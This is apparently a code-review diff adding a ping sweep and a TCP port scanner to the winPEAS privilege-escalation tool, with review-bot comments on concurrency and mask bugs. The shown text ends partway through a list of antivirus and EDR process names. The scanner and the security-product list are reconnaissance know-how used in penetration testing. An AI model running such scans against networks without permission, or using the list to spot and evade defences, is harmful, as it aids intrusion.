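Review bot: `HostsAlive` is a plain `List<string>` that `PingAndUpdateStatus` appends to from continuations running concurrently under `Task.WhenAll`, and `List<T>` is not safe for concurrent writes, so a sweep over a busy subnet can lose entries or corrupt the list. Guard the append while keeping the public type that `NetworkScanner.Scan` reads: declare `private readonly object _gate = new object();` and write `lock (_gate) { HostsAlive.Add(ip); }`. Each `Ping` is also `IDisposable` and never disposed, and one instance plus one task is created per address up front with no cap on the range size (the `AddRange(IEnumerable<string>)` overload and wide netmasks impose none), so a `SemaphoreSlim` bound on in-flight pings, with the `Ping` disposed after its reply, would make the sweep's resource use predictable.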


@ -0,0 +1,93 @@
using System;
using System.Collections.Generic;
using System.Threading.Tasks;
using winPEAS.Helpers;
namespace winPEAS.Info.NetworkInfo.NetworkScanner
{
internal class NetworkScanner
{
enum ScanMode
{
Auto,
IPAddressList,
IPAddressNetmask,
}
private string[] ipAddressList;
private bool isAuto = false;
private ScanMode scanMode = ScanMode.IPAddressList;
private string baseAddress;
private string netmask;
IEnumerable<int> ports;
public NetworkScanner(string options, IEnumerable<int> ports = null)
{
/*
--network "auto" - find interfaces/hosts automatically
--network "10.10.10.10,10.10.10.20" - scan only selected ip address(es)
--network "10.10.10.10/24" - scan host based on ip address/netmask
*/
this.ports = ports;
if (string.Equals(options, "auto", StringComparison.InvariantCultureIgnoreCase))
{
scanMode = ScanMode.Auto;
}
else if (options.Contains("/"))
{
var parts = options.Split('/');
baseAddress = parts[0];
netmask = parts[1];
scanMode = ScanMode.IPAddressNetmask;
}
else
{
ipAddressList = options.Split(',');
scanMode = ScanMode.IPAddressList;
}
}
public void Scan()
{
try
{
Beaprint.GreatPrint("Scanning network (it might take some time)...");
List<string> aliveHosts = new List<string>();
NetPinger netPinger = new NetPinger();
if (scanMode == ScanMode.Auto)
{
// this is the "auto" mode
foreach (var ipAddressAndNetmask in NetworkUtils.GetInternalInterfaces())
{
netPinger.AddRange(ipAddressAndNetmask.Item1, ipAddressAndNetmask.Item2);
}
}
if (scanMode == ScanMode.IPAddressNetmask)
{
netPinger.AddRange(baseAddress, netmask);
}
else if (scanMode == ScanMode.IPAddressList)
{
netPinger.AddRange(ipAddressList);
}
var task = netPinger.RunPingSweepAsync();
task.Wait();
aliveHosts.AddRange(netPinger.HostsAlive);
PortScanner ps = new PortScanner(this.ports);
Parallel.ForEach(aliveHosts, host =>
{
ps.Start(host);
});
}
catch (Exception e)
{
Beaprint.PrintException(e.Message);
}
}
}
}
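Review bot: `Scan` blocks on `task.Wait()` after the ping sweep, which wraps any failure in an `AggregateException`, so the `catch` below prints only the generic "One or more errors occurred." text and hides the real cause; `netPinger.RunPingSweepAsync().GetAwaiter().GetResult();` keeps the same blocking behaviour but surfaces the inner exception. The constructor dereferences `options` before any check (`options.Contains("/")` throws a `NullReferenceException` for a null argument), so a guard such as `if (options == null) throw new ArgumentNullException(nameof(options));` belongs at the top. `isAuto` is assigned but never read and can go. The block comment listing the accepted `--network` forms would serve callers better as an XML `<param name="options">` description on the constructor.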


@ -0,0 +1,221 @@
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Linq;
using System.Net;
using System.Net.NetworkInformation;
namespace winPEAS.Info.NetworkInfo.NetworkScanner
{
internal static class NetworkUtils
{
/// <summary>
/// IPAddress to UInteger
/// </summary>
/// <param name="ipAddress"></param>
/// <returns></returns>
public static uint IPToUInt(this string ipAddress)
{
if (string.IsNullOrEmpty(ipAddress))
return 0;
if (IPAddress.TryParse(ipAddress, out IPAddress ip))
{
var bytes = ip.GetAddressBytes();
Array.Reverse(bytes);
return BitConverter.ToUInt32(bytes, 0);
}
else
return 0;
}
/// <summary>
/// IP in Uinteger to string
/// </summary>
/// <param name="ipUInt"></param>
/// <returns></returns>
public static string IPToString(this uint ipUInt)
{
return ToIPAddress(ipUInt).ToString();
}
/// <summary>
/// IP in Uinteger to IPAddress
/// </summary>
/// <param name="ipUInt"></param>
/// <returns></returns>
public static IPAddress ToIPAddress(this uint ipUInt)
{
var bytes = BitConverter.GetBytes(ipUInt);
Array.Reverse(bytes);
return new IPAddress(bytes);
}
/// <summary>
/// First and Last IPv4 from IP + Mask
/// </summary>
/// <param name="ipv4"></param>
/// <param name="mask">Accepts CIDR or IP. Example 255.255.255.0 or 24</param>
/// <param name="filterUsable">Removes not usable IPs from Range</param>
/// <returns></returns>
/// <remarks>
/// If ´filterUsable=false´ first IP is not usable and last is reserved for broadcast.
/// </remarks>
public static string[] GetIpRange(string ipv4, string mask, bool filterUsable)
{
uint[] uiIpRange = GetIpUintRange(ipv4, mask, filterUsable);
return Array.ConvertAll(uiIpRange, x => IPToString(x));
}
/// <summary>
/// First and Last IPv4 + Mask.
/// </summary>
/// <param name="ipv4"></param>
/// <param name="mask">Accepts CIDR or IP. Example 255.255.255.0 or 24</param>
/// <param name="filterUsable">Removes not usable IPs from Range</param>
/// <returns></returns>
/// <remarks>
/// First IP is not usable and last is reserverd for broadcast.
/// Can use all IPs in between
/// </remarks>
public static uint[] GetIpUintRange(string ipv4, string mask, bool filterUsable)
{
uint sub;
//check if mask is CIDR Notation
if (mask.Contains("."))
{
sub = IPToUInt(mask);
}
else
{
sub = ~(0xffffffff >> Convert.ToInt32(mask));
}
uint ip2 = IPToUInt(ipv4);
uint first = ip2 & sub;
uint last = first | (0xffffffff & ~sub);
if (filterUsable)
{
first += 1;
last -= 1;
}
return new uint[] { first, last };
}
public static IEnumerable<string> GetIPRange(IPAddress startIP, IPAddress endIP)
{
uint sIP = ipToUint(startIP.GetAddressBytes());
uint eIP = ipToUint(endIP.GetAddressBytes());
while (sIP <= eIP)
{
yield return new IPAddress(reverseBytesArray(sIP)).ToString();
sIP++;
}
}
public static string CidrToNetmask(int cidr)
{
var nmask = 0xFFFFFFFF;
nmask <<= 32 - cidr;
byte[] bytes = BitConverter.GetBytes(nmask);
Array.Reverse(bytes);
nmask = BitConverter.ToUInt32(bytes, 0);
var netmask = new System.Net.IPAddress(nmask);
return netmask.ToString();
}
public static IEnumerable<string> GetIPAddressesByNetmask(string ipAddress, string netmask)
{
// TODO
// e.g.
// netmask should be e.g. 24 - currently we only support this format
string[] range = NetworkUtils.GetIpRange(ipAddress, netmask, false);
return range;
}
public static IEnumerable<string> GetHostsByIPAndNetmask(string ipAddressAndNetmask)
{
// TODO
// get hosts by ip address & netmask
// https://itecnote.com/tecnote/c-proper-way-to-scan-a-range-of-ip-addresses/
// we nned to (maybe in parallel)
// - ping e.g. 3 times
// - scan top 5 ports
var parts = ipAddressAndNetmask.Split(':');
return new List<string>
{
parts[0]
};
}
public static List<Tuple<string, string>> GetInternalInterfaces()
{
List<Tuple<string, string>> result = new List<Tuple<string, string>>();
foreach (NetworkInterface ni in NetworkInterface.GetAllNetworkInterfaces())
{
if (ni.OperationalStatus == OperationalStatus.Up &&
(ni.NetworkInterfaceType == NetworkInterfaceType.Wireless80211 || ni.NetworkInterfaceType == NetworkInterfaceType.Ethernet))
{
// Console.WriteLine();
foreach (UnicastIPAddressInformation ip in ni.GetIPProperties().UnicastAddresses)
{
if (ip.Address.AddressFamily == System.Net.Sockets.AddressFamily.InterNetwork)
{
// we need ip address and a netmask as well
result.Add(new Tuple<string, string>(ip.Address.ToString(), ip.IPv4Mask.ToString()));
}
}
}
}
return result;
}
/* Convert bytes array to 32 bit long value */
static uint ipToUint(byte[] ipBytes)
{
ByteConverter bConvert = new ByteConverter();
uint ipUint = 0;
int shift = 24; // indicates number of bits left for shifting
foreach (byte b in ipBytes)
{
if (ipUint == 0)
{
ipUint = (uint)bConvert.ConvertTo(b, typeof(uint)) << shift;
shift -= 8;
continue;
}
if (shift >= 8)
ipUint += (uint)bConvert.ConvertTo(b, typeof(uint)) << shift;
else
ipUint += (uint)bConvert.ConvertTo(b, typeof(uint));
shift -= 8;
}
return ipUint;
}
/* reverse byte order in array */
private static uint reverseBytesArray(uint ip)
{
byte[] bytes = BitConverter.GetBytes(ip);
bytes = bytes.Reverse().ToArray();
return (uint)BitConverter.ToInt32(bytes, 0);
}
}
}
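Review bot: `GetIpUintRange` derives the CIDR mask as `~(0xffffffff >> Convert.ToInt32(mask))`, and C# masks a 32-bit shift count to its low 5 bits, so `"32"` shifts by zero and yields `sub == 0`: a /32 target expands to the whole IPv4 space (first 0.0.0.0, last 255.255.255.255), and `GetIPRange` then never terminates because `sIP++` wraps past an `eIP` of `0xffffffff`. `CidrToNetmask` has the mirror problem for `cidr == 0`. Validate and special-case the edges, e.g. `int cidr = Convert.ToInt32(mask); if (cidr < 0 || cidr > 32) throw new ArgumentOutOfRangeException(nameof(mask)); sub = cidr == 0 ? 0u : 0xffffffffu << (32 - cidr);`, and make `GetIPRange` stop when `sIP == eIP` before incrementing. `filterUsable` also underflows for /31 and /32, where there is no network or broadcast address to strip.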


@ -0,0 +1,122 @@
using System;
using System.Collections.Generic;
using System.Net.Sockets;
using System.Threading;
using System.Threading.Tasks;
namespace winPEAS.Info.NetworkInfo.NetworkScanner
{
class PortScanner
{
private int TcpTimeout = 500; // ms
#region nmap tcp top 1000
static List<int> nmapTop1000TCPPorts = new List<int>
{
1,3,4,6,7,9,13,17,19,20,21,22,23,24,25,26,30,32,33,37,42,43,49,53,70,79,80,81,82,83,84,85,88,89,90,99,100,106,109,110,111,113,119,125,135,139,143,144,146,161,163,
179,199,211,212,222,254,255,256,259,264,280,301,306,311,340,366,389,406,407,416,417,425,427,443,444,445,458,464,465,481,497,500,512,513,514,515,524,541,543,544,545,
548,554,555,563,587,593,616,617,625,631,636,646,648,666,667,668,683,687,691,700,705,711,714,720,722,726,749,765,777,783,787,800,801,808,843,873,880,888,898,900,901,
902,903,911,912,981,987,990,992,993,995,999,1000,1001,1002,1007,1009,1010,1011,1021,1022,1023,1024,1025,1026,1027,1028,1029,1030,1031,1032,1033,1034,1035,1036,1037,
1038,1039,1040,1041,1042,1043,1044,1045,1046,1047,1048,1049,1050,1051,1052,1053,1054,1055,1056,1057,1058,1059,1060,1061,1062,1063,1064,1065,1066,1067,1068,1069,1070,
1071,1072,1073,1074,1075,1076,1077,1078,1079,1080,1081,1082,1083,1084,1085,1086,1087,1088,1089,1090,1091,1092,1093,1094,1095,1096,1097,1098,1099,1100,1102,1104,1105,
1106,1107,1108,1110,1111,1112,1113,1114,1117,1119,1121,1122,1123,1124,1126,1130,1131,1132,1137,1138,1141,1145,1147,1148,1149,1151,1152,1154,1163,1164,1165,1166,1169,
1174,1175,1183,1185,1186,1187,1192,1198,1199,1201,1213,1216,1217,1218,1233,1234,1236,1244,1247,1248,1259,1271,1272,1277,1287,1296,1300,1301,1309,1310,1311,1322,1328,
1334,1352,1417,1433,1434,1443,1455,1461,1494,1500,1501,1503,1521,1524,1533,1556,1580,1583,1594,1600,1641,1658,1666,1687,1688,1700,1717,1718,1719,1720,1721,1723,1755,
1761,1782,1783,1801,1805,1812,1839,1840,1862,1863,1864,1875,1900,1914,1935,1947,1971,1972,1974,1984,1998,1999,2000,2001,2002,2003,2004,2005,2006,2007,2008,2009,2010,
2013,2020,2021,2022,2030,2033,2034,2035,2038,2040,2041,2042,2043,2045,2046,2047,2048,2049,2065,2068,2099,2100,2103,2105,2106,2107,2111,2119,2121,2126,2135,2144,2160,
2161,2170,2179,2190,2191,2196,2200,2222,2251,2260,2288,2301,2323,2366,2381,2382,2383,2393,2394,2399,2401,2492,2500,2522,2525,2557,2601,2602,2604,2605,2607,2608,2638,
2701,2702,2710,2717,2718,2725,2800,2809,2811,2869,2875,2909,2910,2920,2967,2968,2998,3000,3001,3003,3005,3006,3007,3011,3013,3017,3030,3031,3052,3071,3077,3128,3168,
3211,3221,3260,3261,3268,3269,3283,3300,3301,3306,3322,3323,3324,3325,3333,3351,3367,3369,3370,3371,3372,3389,3390,3404,3476,3493,3517,3527,3546,3551,3580,3659,3689,
3690,3703,3737,3766,3784,3800,3801,3809,3814,3826,3827,3828,3851,3869,3871,3878,3880,3889,3905,3914,3918,3920,3945,3971,3986,3995,3998,4000,4001,4002,4003,4004,4005,
4006,4045,4111,4125,4126,4129,4224,4242,4279,4321,4343,4443,4444,4445,4446,4449,4550,4567,4662,4848,4899,4900,4998,5000,5001,5002,5003,5004,5009,5030,5033,5050,5051,
5054,5060,5061,5080,5087,5100,5101,5102,5120,5190,5200,5214,5221,5222,5225,5226,5269,5280,5298,5357,5405,5414,5431,5432,5440,5500,5510,5544,5550,5555,5560,5566,5631,
5633,5666,5678,5679,5718,5730,5800,5801,5802,5810,5811,5815,5822,5825,5850,5859,5862,5877,5900,5901,5902,5903,5904,5906,5907,5910,5911,5915,5922,5925,5950,5952,5959,
5960,5961,5962,5963,5987,5988,5989,5998,5999,6000,6001,6002,6003,6004,6005,6006,6007,6009,6025,6059,6100,6101,6106,6112,6123,6129,6156,6346,6389,6502,6510,6543,6547,
6565,6566,6567,6580,6646,6666,6667,6668,6669,6689,6692,6699,6779,6788,6789,6792,6839,6881,6901,6969,7000,7001,7002,7004,7007,7019,7025,7070,7100,7103,7106,7200,7201,
7402,7435,7443,7496,7512,7625,7627,7676,7741,7777,7778,7800,7911,7920,7921,7937,7938,7999,8000,8001,8002,8007,8008,8009,8010,8011,8021,8022,8031,8042,8045,8080,8081,
8082,8083,8084,8085,8086,8087,8088,8089,8090,8093,8099,8100,8180,8181,8192,8193,8194,8200,8222,8254,8290,8291,8292,8300,8333,8383,8400,8402,8443,8500,8600,8649,8651,
8652,8654,8701,8800,8873,8888,8899,8994,9000,9001,9002,9003,9009,9010,9011,9040,9050,9071,9080,9081,9090,9091,9099,9100,9101,9102,9103,9110,9111,9200,9207,9220,9290,
9415,9418,9485,9500,9502,9503,9535,9575,9593,9594,9595,9618,9666,9876,9877,9878,9898,9900,9917,9929,9943,9944,9968,9998,9999,10000,10001,10002,10003,10004,10009,10010,
10012,10024,10025,10082,10180,10215,10243,10566,10616,10617,10621,10626,10628,10629,10778,11110,11111,11967,12000,12174,12265,12345,13456,13722,13782,13783,14000,14238,
14441,14442,15000,15002,15003,15004,15660,15742,16000,16001,16012,16016,16018,16080,16113,16992,16993,17877,17988,18040,18101,18988,19101,19283,19315,19350,19780,19801,
19842,20000,20005,20031,20221,20222,20828,21571,22939,23502,24444,24800,25734,25735,26214,27000,27352,27353,27355,27356,27715,28201,30000,30718,30951,31038,31337,32768,
32769,32770,32771,32772,32773,32774,32775,32776,32777,32778,32779,32780,32781,32782,32783,32784,32785,33354,33899,34571,34572,34573,35500,38292,40193,40911,41511,42510,
44176,44442,44443,44501,45100,48080,49152,49153,49154,49155,49156,49157,49158,49159,49160,49161,49163,49165,49167,49175,49176,49400,49999,50000,50001,50002,50003,50006,
50300,50389,50500,50636,50800,51103,51493,52673,52822,52848,52869,54045,54328,55055,55056,55555,55600,56737,56738,57294,57797,58080,60020,60443,61532,61900,62078,63331,
64623,64680,65000,65129,65389
};
#endregion
private struct TcpPortState
{
public TcpClient MainClient { get; set; }
public bool IsTcpPortOpen { get; set; }
}
IEnumerable<int> portsToScan = nmapTop1000TCPPorts;
public PortScanner(IEnumerable<int> ports)
{
if (ports != null)
{
portsToScan = ports;
}
}
public void Start(string host)
{
Parallel.ForEach(portsToScan, port =>
{
RunScanTcp(host, port);
});
}
public void RunScanTcp(string host, int port)
{
Thread.Sleep(1);
var newClient = new TcpClient();
var state = new TcpPortState
{
MainClient = newClient,
IsTcpPortOpen = true
};
IAsyncResult ar = newClient.BeginConnect(host, port, AsyncCallback, state);
state.IsTcpPortOpen = ar.AsyncWaitHandle.WaitOne(TcpTimeout, false);
if (state.IsTcpPortOpen == false || newClient.Connected == false)
{
return;
}
Console.WriteLine("[+] Open TCP port at: {0}:{1}", host, port);
}
void AsyncCallback(IAsyncResult asyncResult)
{
var state = (TcpPortState)asyncResult.AsyncState;
TcpClient client = state.MainClient;
try
{
client.EndConnect(asyncResult);
}
catch
{
return;
}
if (client.Connected && state.IsTcpPortOpen)
{
return;
}
client.Close();
}
}
}


@ -4,664 +4,103 @@ namespace winPEAS.Info.ProcessInfo
{
static class DefensiveProcesses
{
public static Dictionary<string, string> Definitions = new Dictionary<string, string>()
private static Dictionary<string, HashSet<string>> Definitions = new Dictionary<string, HashSet<string>>()
{
{"mcshield.exe" , "McAfee AV"},
{"windefend.exe" , "Windows Defender AV"},
{"MSASCui.exe" , "Windows Defender AV"},
{"MSASCuiL.exe" , "Windows Defender AV"},
{"msmpeng.exe" , "Windows Defender AV"},
{"msmpsvc.exe" , "Windows Defender AV"},
{"WRSA.exe" , "WebRoot AV"},
{"savservice.exe" , "Sophos AV"},
{"TMCCSF.exe" , "Trend Micro AV"},
{"symantec antivirus.exe" , "Symantec AV"},
{"mbae.exe" , "MalwareBytes Anti-Exploit"},
{"parity.exe" , "Bit9 application whitelisting"},
{"cb.exe" , "Carbon Black behavioral analysis"},
{"bds-vision.exe" , "BDS Vision behavioral analysis"},
{"Triumfant.exe" , "Triumfant behavioral analysis"},
{"CSFalcon.exe" , "CrowdStrike Falcon EDR"},
{"ossec.exe" , "OSSEC intrusion detection"},
{"TmPfw.exe" , "Trend Micro firewall"},
{"dgagent.exe" , "Verdasys Digital Guardian DLP"},
{"kvoop.exe" , " DLP process" },
{"AAWTray.exe" , ""},
{"ackwin32.exe" , ""},
{"Ad-Aware.exe" , ""},
{"adaware.exe" , ""},
{"advxdwin.exe" , ""},
{"agentsvr.exe" , ""},
{"agentw.exe" , ""},
{"alertsvc.exe" , ""},
{"alevir.exe" , ""},
{"alogserv.exe" , ""},
{"amon9x.exe" , ""},
{"anti-trojan.exe" , ""},
{"antivirus.exe" , ""},
{"ants.exe" , ""},
{"apimonitor.exe" , ""},
{"aplica32.exe" , ""},
{"apvxdwin.exe" , ""},
{"arr.exe" , ""},
{"atcon.exe" , ""},
{"atguard.exe" , ""},
{"atro55en.exe" , ""},
{"atupdater.exe" , ""},
{"atwatch.exe" , ""},
{"au.exe" , ""},
{"aupdate.exe" , ""},
{"auto-protect.nav80try.exe", ""},
{"autodown.exe" , ""},
{"autoruns.exe" , ""},
{"autorunsc.exe" , ""},
{"autotrace.exe" , ""},
{"autoupdate.exe" , ""},
{"avconsol.exe" , ""},
{"ave32.exe" , ""},
{"avgcc32.exe" , ""},
{"avgctrl.exe" , ""},
{"avgemc.exe" , ""},
{"avgnt.exe" , ""},
{"avgrsx.exe" , ""},
{"avgserv.exe" , ""},
{"avgserv9.exe" , ""},
{"avguard.exe" , ""},
{"avgwdsvc.exe" , ""},
{"avgui.exe" , ""},
{"avgw.exe" , ""},
{"avkpop.exe" , ""},
{"avkserv.exe" , ""},
{"avkservice.exe" , ""},
{"avkwctl9.exe" , ""},
{"avltmain.exe" , ""},
{"avnt.exe" , ""},
{"avp.exe" , ""},
{"avp32.exe" , ""},
{"avpcc.exe" , ""},
{"avpdos32.exe" , ""},
{"avpm.exe" , ""},
{"avptc32.exe" , ""},
{"avpupd.exe" , ""},
{"avsched32.exe" , ""},
{"avsynmgr.exe" , ""},
{"avwin.exe" , ""},
{"avwin95.exe" , ""},
{"avwinnt.exe" , ""},
{"avwupd.exe" , ""},
{"avwupd32.exe" , ""},
{"avwupsrv.exe" , ""},
{"avxmonitor9x.exe" , ""},
{"avxmonitornt.exe" , ""},
{"avxquar.exe" , ""},
{"backweb.exe" , ""},
{"bargains.exe" , ""},
{"bd_professional.exe" , ""},
{"beagle.exe" , ""},
{"belt.exe" , ""},
{"bidef.exe" , ""},
{"bidserver.exe" , ""},
{"bipcp.exe" , ""},
{"bipcpevalsetup.exe" , ""},
{"bisp.exe" , ""},
{"blackd.exe" , ""},
{"blackice.exe" , ""},
{"blink.exe" , ""},
{"blss.exe" , ""},
{"bootconf.exe" , ""},
{"bootwarn.exe" , ""},
{"borg2.exe" , ""},
{"bpc.exe" , ""},
{"brasil.exe" , ""},
{"bs120.exe" , ""},
{"bundle.exe" , ""},
{"bvt.exe" , ""},
{"ccapp.exe" , ""},
{"ccevtmgr.exe" , ""},
{"ccpxysvc.exe" , ""},
{"ccSvcHst.exe" , ""},
{"cdp.exe" , ""},
{"cfd.exe" , ""},
{"cfgwiz.exe" , ""},
{"cfiadmin.exe" , ""},
{"cfiaudit.exe" , ""},
{"cfinet.exe" , ""},
{"cfinet32.exe" , ""},
{"claw95.exe" , ""},
{"claw95cf.exe" , ""},
{"clean.exe" , ""},
{"cleaner.exe" , ""},
{"cleaner3.exe" , ""},
{"cleanpc.exe" , ""},
{"cleanup.exe" , ""},
{"click.exe" , ""},
{"cmdagent.exe" , ""},
{"cmesys.exe" , ""},
{"cmgrdian.exe" , ""},
{"cmon016.exe" , ""},
{"connectionmonitor.exe" , ""},
{"cpd.exe" , ""},
{"cpf9x206.exe" , ""},
{"cpfnt206.exe" , ""},
{"ctrl.exe" , ""},
{"cv.exe" , ""},
{"cwnb181.exe" , ""},
{"cwntdwmo.exe" , ""},
{"CylanceUI.exe" , ""},
{"CyProtect.exe" , ""},
{"CyUpdate.exe" , ""},
{"cyserver.exe" , ""},
{"cytray.exe" , ""},
{"CyveraService.exe" , ""},
{"datemanager.exe" , ""},
{"dcomx.exe" , ""},
{"defalert.exe" , ""},
{"defscangui.exe" , ""},
{"defwatch.exe" , ""},
{"deputy.exe" , ""},
{"divx.exe" , ""},
{"dgprompt.exe" , ""},
{"DgService.exe" , ""},
{"dllcache.exe" , ""},
{"dllreg.exe" , ""},
{"doors.exe" , ""},
{"dpf.exe" , ""},
{"dpfsetup.exe" , ""},
{"dpps2.exe" , ""},
{"drwatson.exe" , ""},
{"drweb32.exe" , ""},
{"drwebupw.exe" , ""},
{"dssagent.exe" , ""},
{"dumpcap.exe" , ""},
{"dvp95.exe" , ""},
{"dvp95_0.exe" , ""},
{"ecengine.exe" , ""},
{"efpeadm.exe" , ""},
{"egui.exe" , ""},
{"ekrn.exe" , ""},
{"emet_agent.exe" , ""},
{"emet_service.exe" , ""},
{"emsw.exe" , ""},
{"engineserver.exe" , ""},
{"ent.exe" , ""},
{"esafe.exe" , ""},
{"escanhnt.exe" , ""},
{"escanv95.exe" , ""},
{"espwatch.exe" , ""},
{"ethereal.exe" , ""},
{"etrustcipe.exe" , ""},
{"evpn.exe" , ""},
{"exantivirus-cnet.exe" , ""},
{"exe.avxw.exe" , ""},
{"expert.exe" , ""},
{"explore.exe" , ""},
{"f-agnt95.exe" , ""},
{"f-prot.exe" , ""},
{"f-prot95.exe" , ""},
{"f-stopw.exe" , ""},
{"fameh32.exe" , ""},
{"fast.exe" , ""},
{"fch32.exe" , ""},
{"fcagswd.exe" , "McAfee DLP Agent"},
{"fcags.exe" , "McAfee DLP Agent"},
{"fih32.exe" , ""},
{"findviru.exe" , ""},
{"firesvc.exe" , "McAfee Host Intrusion Prevention"},
{"firetray.exe" , ""},
{"firewall.exe" , ""},
{"fnrb32.exe" , ""},
{"fp-win.exe" , ""},
{"fp-win_trial.exe" , ""},
{"fprot.exe" , ""},
{"frameworkservice.exe" , ""},
{"frminst.exe" , ""},
{"frw.exe" , ""},
{"fsaa.exe" , ""},
{"fsav.exe" , ""},
{"fsav32.exe" , ""},
{"fsav530stbyb.exe" , ""},
{"fsav530wtbyb.exe" , ""},
{"fsav95.exe" , ""},
{"fsgk32.exe" , ""},
{"fsm32.exe" , ""},
{"fsma32.exe" , ""},
{"fsmb32.exe" , ""},
{"gator.exe" , ""},
{"gbmenu.exe" , ""},
{"gbpoll.exe" , ""},
{"generics.exe" , ""},
{"gmt.exe" , ""},
{"guard.exe" , ""},
{"guarddog.exe" , ""},
{"hacktracersetup.exe" , ""},
{"hbinst.exe" , ""},
{"hbsrv.exe" , ""},
{"HijackThis.exe" , ""},
{"hipsvc.exe" , ""},
{"HipMgmt.exe" , "McAfee Host Intrusion Protection"},
{"hotactio.exe" , ""},
{"hotpatch.exe" , ""},
{"htlog.exe" , ""},
{"htpatch.exe" , ""},
{"hwpe.exe" , ""},
{"hxdl.exe" , ""},
{"hxiul.exe" , ""},
{"iamapp.exe" , ""},
{"iamserv.exe" , ""},
{"iamstats.exe" , ""},
{"ibmasn.exe" , ""},
{"ibmavsp.exe" , ""},
{"icload95.exe" , ""},
{"icloadnt.exe" , ""},
{"icmon.exe" , ""},
{"icsupp95.exe" , ""},
{"icsuppnt.exe" , ""},
{"idle.exe" , ""},
{"iedll.exe" , ""},
{"iedriver.exe" , ""},
{"iface.exe" , ""},
{"ifw2000.exe" , ""},
{"inetlnfo.exe" , ""},
{"infus.exe" , ""},
{"infwin.exe" , ""},
{"init.exe" , ""},
{"intdel.exe" , ""},
{"intren.exe" , ""},
{"iomon98.exe" , ""},
{"istsvc.exe" , ""},
{"jammer.exe" , ""},
{"jdbgmrg.exe" , ""},
{"jedi.exe" , ""},
{"kavlite40eng.exe" , ""},
{"kavpers40eng.exe" , ""},
{"kavpf.exe" , ""},
{"kazza.exe" , ""},
{"keenvalue.exe" , ""},
{"kerio-pf-213-en-win.exe" , ""},
{"kerio-wrl-421-en-win.exe" , ""},
{"kerio-wrp-421-en-win.exe" , ""},
{"kernel32.exe" , ""},
{"KeyPass.exe" , ""},
{"killprocesssetup161.exe" , ""},
{"launcher.exe" , ""},
{"ldnetmon.exe" , ""},
{"ldpro.exe" , ""},
{"ldpromenu.exe" , ""},
{"ldscan.exe" , ""},
{"lnetinfo.exe" , ""},
{"loader.exe" , ""},
{"localnet.exe" , ""},
{"lockdown.exe" , ""},
{"lockdown2000.exe" , ""},
{"lookout.exe" , ""},
{"lordpe.exe" , ""},
{"lsetup.exe" , ""},
{"luall.exe" , ""},
{"luau.exe" , ""},
{"lucomserver.exe" , ""},
{"luinit.exe" , ""},
{"luspt.exe" , ""},
{"mapisvc32.exe" , ""},
{"masvc.exe" , "McAfee Agent"},
{"mbamservice.exe" , ""},
{"mcafeefire.exe" , ""},
{"mcagent.exe" , ""},
{"mcmnhdlr.exe" , ""},
{"mcscript.exe" , ""},
{"mcscript_inuse.exe" , ""},
{"mctool.exe" , ""},
{"mctray.exe" , ""},
{"mcupdate.exe" , ""},
{"mcvsrte.exe" , ""},
{"mcvsshld.exe" , ""},
{"md.exe" , ""},
{"mfeann.exe" , "McAfee VirusScan Enterprise"},
{"mfemactl.exe" , "McAfee VirusScan Enterprise"},
{"mfevtps.exe" , ""},
{"mfin32.exe" , ""},
{"mfw2en.exe" , ""},
{"mfweng3.02d30.exe" , ""},
{"mgavrtcl.exe" , ""},
{"mgavrte.exe" , ""},
{"mghtml.exe" , ""},
{"mgui.exe" , ""},
{"minilog.exe" , ""},
{"minionhost.exe" , ""},
{"mmod.exe" , ""},
{"monitor.exe" , ""},
{"moolive.exe" , ""},
{"mostat.exe" , ""},
{"mpfagent.exe" , ""},
{"mpfservice.exe" , ""},
{"mpftray.exe" , ""},
{"mrflux.exe" , ""},
{"msapp.exe" , ""},
{"msbb.exe" , ""},
{"msblast.exe" , ""},
{"mscache.exe" , ""},
{"msccn32.exe" , ""},
{"mscman.exe" , ""},
{"msconfig.exe" , ""},
{"msdm.exe" , ""},
{"msdos.exe" , ""},
{"msiexec16.exe" , ""},
{"msinfo32.exe" , ""},
{"mslaugh.exe" , ""},
{"msmgt.exe" , ""},
{"msmsgri32.exe" , ""},
{"MsSense.exe" , "Microsoft Defender ATP"},
{"mssmmc32.exe" , ""},
{"mssys.exe" , ""},
{"msvxd.exe" , ""},
{"mu0311ad.exe" , ""},
{"mwatch.exe" , ""},
{"n32scanw.exe" , ""},
{"naprdmgr.exe" , ""},
{"nav.exe" , ""},
{"navap.navapsvc.exe" , ""},
{"navapsvc.exe" , ""},
{"navapw32.exe" , ""},
{"navdx.exe" , ""},
{"navlu32.exe" , ""},
{"navnt.exe" , ""},
{"navstub.exe" , ""},
{"navw32.exe" , ""},
{"navwnt.exe" , ""},
{"nc2000.exe" , ""},
{"ncinst4.exe" , ""},
{"ndd32.exe" , ""},
{"neomonitor.exe" , ""},
{"neowatchlog.exe" , ""},
{"netarmor.exe" , ""},
{"netd32.exe" , ""},
{"netinfo.exe" , ""},
{"netmon.exe" , ""},
{"netscanpro.exe" , ""},
{"netspyhunter-1.2.exe" , ""},
{"netstat.exe" , ""},
{"netutils.exe" , ""},
{"nisserv.exe" , ""},
{"nisum.exe" , ""},
{"nmain.exe" , ""},
{"nod32.exe" , ""},
{"normist.exe" , ""},
{"norton_internet_secu_3.0_407.exe" , ""},
{"notstart.exe" , ""},
{"npf40_tw_98_nt_me_2k.exe" , ""},
{"npfmessenger.exe" , ""},
{"nprotect.exe" , ""},
{"npscheck.exe" , ""},
{"npssvc.exe" , ""},
{"nsched32.exe" , ""},
{"nssys32.exe" , ""},
{"nstask32.exe" , ""},
{"nsupdate.exe" , ""},
{"nt.exe" , ""},
{"ntrtscan.exe" , ""},
{"ntvdm.exe" , ""},
{"ntxconfig.exe" , ""},
{"nui.exe" , ""},
{"nupgrade.exe" , ""},
{"nvarch16.exe" , ""},
{"nvc95.exe" , ""},
{"nvsvc32.exe" , ""},
{"nwinst4.exe" , ""},
{"nwservice.exe" , ""},
{"nwtool16.exe" , ""},
{"nxlog.exe" , ""},
{"ollydbg.exe" , ""},
{"onsrvr.exe" , ""},
{"optimize.exe" , ""},
{"ostronet.exe" , ""},
{"osqueryd.exe" , ""},
{"otfix.exe" , ""},
{"outpost.exe" , ""},
{"outpostinstall.exe" , ""},
{"outpostproinstall.exe" , ""},
{"padmin.exe" , ""},
{"panixk.exe" , ""},
{"patch.exe" , ""},
{"pavcl.exe" , ""},
{"pavproxy.exe" , ""},
{"pavsched.exe" , ""},
{"pavw.exe" , ""},
{"pccwin98.exe" , ""},
{"pcfwallicon.exe" , ""},
{"pcip10117_0.exe" , ""},
{"pcscan.exe" , ""},
{"pdsetup.exe" , ""},
{"periscope.exe" , ""},
{"persfw.exe" , ""},
{"perswf.exe" , ""},
{"pf2.exe" , ""},
